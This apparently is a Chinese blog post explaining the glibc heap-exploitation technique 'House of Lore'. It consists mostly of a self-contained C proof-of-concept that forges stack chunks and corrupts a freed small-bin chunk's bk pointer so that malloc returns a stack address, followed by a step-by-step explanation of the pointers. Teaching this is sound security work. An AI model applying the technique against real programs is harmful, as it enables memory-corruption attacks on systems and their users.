<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="house of lore例程1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889#include &lt;std">
<meta property="og:type" content="article">
<meta property="og:title" content="堆利用系列九：House of Lore">
<meta property="og:url" content="https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/index.html">
<meta property="og:site_name" content="Colorlight&#39;s Blog">
<meta property="og:description" content="house of lore例程1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889#include &lt;std">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://colorlight.github.io/images/heap_exp/2021-06-15-11-33-57.png">
<meta property="article:published_time" content="2021-06-17T13:23:43.000Z">
<meta property="article:modified_time" content="2021-06-17T13:27:24.588Z">
<meta property="article:author" content="Colorlight">
<meta property="article:tag" content="堆利用">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://colorlight.github.io/images/heap_exp/2021-06-15-11-33-57.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>堆利用系列九：House of Lore</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/atom.xml" title="Colorlight&#39;s Blog" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" "Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/atom.xml">RSS</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="下一篇 " href="/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部 " href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章 " href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/&text=堆利用系列九：House of Lore"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/&title=堆利用系列九：House of Lore"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/&is_video=false&description=堆利用系列九：House of Lore"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=堆利用系列九：House of Lore&body=Check out this article: https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/&title=堆利用系列九：House of Lore"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/&title=堆利用系列九：House of Lore"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/&title=堆利用系列九：House of Lore"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/&title=堆利用系列九：House of Lore"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/&name=堆利用系列九：House of Lore&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/&t=堆利用系列九：House of Lore"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#house-of-lore%E4%BE%8B%E7%A8%8B"><span class="toc-number">1.</span> <span class="toc-text">house of lore例程</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        堆利用系列九：House of Lore
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Colorlight</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-06-17T13:23:43.000Z" itemprop="datePublished">2021-06-17</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/%E5%A0%86%E5%88%A9%E7%94%A8/">堆利用</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/%E5%A0%86%E5%88%A9%E7%94%A8/" rel="tag">堆利用</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="house-of-lore例程"><a href="#house-of-lore例程" class="headerlink" title="house of lore例程"></a>house of lore例程</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line"></span><br><span class="line">int main(void)</span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">  puts(&quot;So let&apos;s cover House of Lore.&quot;);</span><br><span class="line">  puts(&quot;House of Lore focuses on attacking the small bin to allocate a chunk outside of the heap.&quot;);</span><br><span class="line">  puts(&quot;We will essentially create two fake small bin chunks, then overwrite the bk pointer of the small bin chunk to point to the first chunk.&quot;);</span><br><span class="line">  puts(&quot;Then just allocate chunks until we get a fake chunk.&quot;);</span><br><span class="line">  puts(&quot;It&apos;s sort of like a fast bin attack, however with more setup and restrictions.&quot;);</span><br><span class="line">  puts(&quot;Let&apos;s get started.\n\n&quot;);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  printf(&quot;We will start off by grooming the heap so we can do House of Lore.\n&quot;);</span><br><span class="line">  printf(&quot;For that we will need a chunk in the small bin that we can edit with some sort of bug.\n&quot;);</span><br><span class="line">  printf(&quot;For this we will allocate a small bin size chunk (by default on x64 it is greater than 0x80 and less than 0x400).\n\n&quot;);</span><br><span class="line"></span><br><span class="line">  unsigned long *ptr0;</span><br><span class="line">  ptr0 = malloc(0x200);</span><br><span class="line"></span><br><span class="line">  printf(&quot;Allocated chunk at:\t%p\n\n&quot;, ptr0);</span><br><span class="line"></span><br><span class="line">  printf(&quot;Next we will allocate another chunk, just to avoid consolidating our ptr0 chunk with the top chunk.\n\n&quot;);</span><br><span class="line"></span><br><span class="line">  malloc(0x40);</span><br><span class="line"></span><br><span class="line">  printf(&quot;Next up we will insert our first heap chunk into the unsorted bin by freeing it.\n\n&quot;);</span><br><span class="line"></span><br><span class="line">  free(ptr0);</span><br><span class="line"></span><br><span class="line">  printf(&quot;Now we will insert our unsorted bin chunk into the small bin by allocating a heap chunk big enough that it can&apos;t come out of the unsorted bin.\n&quot;);</span><br><span class="line"></span><br><span class="line">  malloc(0x500);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  printf(&quot;Now that we have a chunk in the small bin, we can move on to forging the fake chunks.\n\n&quot;);</span><br><span class="line"></span><br><span class="line">  printf(&quot;The small bin is a doubly linked list, with a fwd and bk pointer.\n&quot;);</span><br><span class="line">  printf(&quot;The chunk that we allocate outside of the heap needs to have a fwd and bk pointer to chunks that their opposite pointers point back to them.\n&quot;);</span><br><span class="line">  printf(&quot;Due to checks made by malloc the fwd chunk&apos;s bk pointer needs to point to the chunk outside of the heap we will allocate with malloc, and vice versa.\n&quot;);</span><br><span class="line">  printf(&quot;So in total we will need three chunks, one of which is our small bin chunk, and the other two will be on the stack.\n&quot;);</span><br><span class="line">  printf(&quot;Our goal is to get malloc to allocate fake chunk 0 (it will be at an offset of 0x10 from the start).\n\n&quot;);</span><br><span class="line"></span><br><span class="line">  unsigned long fake0[4];</span><br><span class="line">  unsigned long fake1[4];</span><br><span class="line"></span><br><span class="line">  printf(&quot;Fake Chunk 0:\t%p\n&quot;, fake0);</span><br><span class="line">  printf(&quot;Fake Chunk 1:\t%p\n\n&quot;, fake1);</span><br><span class="line"></span><br><span class="line">  printf(&quot;Now we will write the pointers that will link our two fake chunks on the stack.\n&quot;);</span><br><span class="line">  printf(&quot;The bk pointer for fake chunk 0 will point to fake chunk 1.\n&quot;);</span><br><span class="line">  printf(&quot;The fwd pointer for fake chunk 1 will point to fake chunk 0.\n&quot;);</span><br><span class="line">  printf(&quot;This is because if a chunk is allocated from the small bin, the next chunk will be the bk chunk.\n&quot;);</span><br><span class="line">  printf(&quot;Also keep in mind, these pointers are to the start of the heap metadata.\n\n&quot;);</span><br><span class="line"></span><br><span class="line">  fake0[3] = (unsigned long)fake1;</span><br><span class="line">  fake1[2] = (unsigned long)fake0;  //这个地方是为了绕过malloc(): smallbin double linked list corrupted</span><br><span class="line"></span><br><span class="line">  printf(&quot;Now we will write the two pointers that will link together fake chunk 0 and our small bin chunk.\n&quot;);</span><br><span class="line">  printf(&quot;This is also where our bug comes in to edit a freed small bin chunk.\n&quot;);</span><br><span class="line">  printf(&quot;We will use the bug to overwrite the bk pointer for the small bin chunk to point to point to fake chunk 0.\n&quot;);</span><br><span class="line">  printf(&quot;Then we will overwrite the fwd chunk of the fake chunk 0 to point to the small bin chunk.\n\n&quot;);</span><br><span class="line"></span><br><span class="line">  ptr0[1]  = (unsigned long)fake0;</span><br><span class="line">  fake0[2] = (unsigned long)((unsigned long *)ptr0 - 2);</span><br><span class="line"></span><br><span class="line">  printf(&quot;small bin bk:\t\t0x%lx\n&quot;, ptr0[1]);</span><br><span class="line">  printf(&quot;fake chunk 0 fwd:\t0x%lx\n&quot;, fake0[2]);</span><br><span class="line">  printf(&quot;fake chunk 0 bk:\t0x%lx\n&quot;, fake0[3]);</span><br><span class="line">  printf(&quot;fake chunk 1 fwd:\t0x%lx\n\n&quot;, fake1[2]);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  printf(&quot;Now that our setup is out of the way, let&apos;s have malloc allocate fake chunk 0.\n&quot;);</span><br><span class="line">  printf(&quot;We will allocate a heap chunk equal to the size of our small bin chunk.\n&quot;);</span><br><span class="line">  printf(&quot;This will allocate our small bin chunk, and move our fake chunk to the top of the small bin.\n&quot;);</span><br><span class="line">  printf(&quot;Then with another allocation we will get our fake chunk from malloc.\n\n&quot;);</span><br><span class="line"></span><br><span class="line">  printf(&quot;Allocation 0:\t%p\n&quot;, malloc(0x200));   // b1</span><br><span class="line">  printf(&quot;Allocation 1:\t%p\n&quot;, malloc(0x200));   // b2</span><br><span class="line"></span><br><span class="line">  printf(&quot;\nJust like that, we executed a House of Lore attack!\n&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>通过下图了解glibc到底改变了哪些指针<br><img src="/images/heap_exp/2021-06-15-11-33-57.png" alt></p>
<p>1.黑色箭头为0x210的chunk刚放到small bin的双向链表上的情况，此时small bin的fd bk指针都指向这个0x210chunk，该chunk的fd，bk指针也都指向small bin。  </p>
<p>2.红色箭头是使用一些漏洞对已经释放的chunk进行操作，让它的bk指针指向我们能够控制的fake0，对fake0和fake1的操作都是为了规避glibc对small bin双向链表的校验，假设victim这个chunk已经存放在了small bin上了，如果vicitim正好满足一个新的请求，glibc会去校验vicitim的后面一个chunk的fd指针，校验它是不是指向vicitim，如果不满足则直接报错崩溃。<br><code>fake0[2] = (unsigned long)((unsigned long *)ptr0 - 2);</code>这条是为了满足后面一次malloc的校验，<code>fake0[3] = (unsigned long)fake1;fake1[2] = (unsigned long)fake0;</code>这两条是为了满足后面第二次malloc的校验。</p>
<p>3.绿色的箭头是b1处malloc后的指针情况，当从small bin的链表上取chunk的时候，是从尾部取出chunk，然后修改两个指针。</p>
<p>4.紫色箭头是b2处的malloc后的指针情况，同样要修改两个指针。</p>
<p>思考一下应用条件，需要有能力修改一个已经释放到small bin上的chunk，需要有能力控制一块内存区域去构造两个虚假的chunk。</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/atom.xml">RSS</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#house-of-lore%E4%BE%8B%E7%A8%8B"><span class="toc-number">1.</span> <span class="toc-text">house of lore例程</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/&text=堆利用系列九：House of Lore"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/&title=堆利用系列九：House of Lore"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/&is_video=false&description=堆利用系列九：House of Lore"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=堆利用系列九：House of Lore&body=Check out this article: https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/&title=堆利用系列九：House of Lore"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/&title=堆利用系列九：House of Lore"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/&title=堆利用系列九：House of Lore"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/&title=堆利用系列九：House of Lore"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/&name=堆利用系列九：House of Lore&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%9D%EF%BC%9AHouse-of-Lore/&t=堆利用系列九：House of Lore"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2021
    Colorlight
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/atom.xml">RSS</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


</body>
</html>
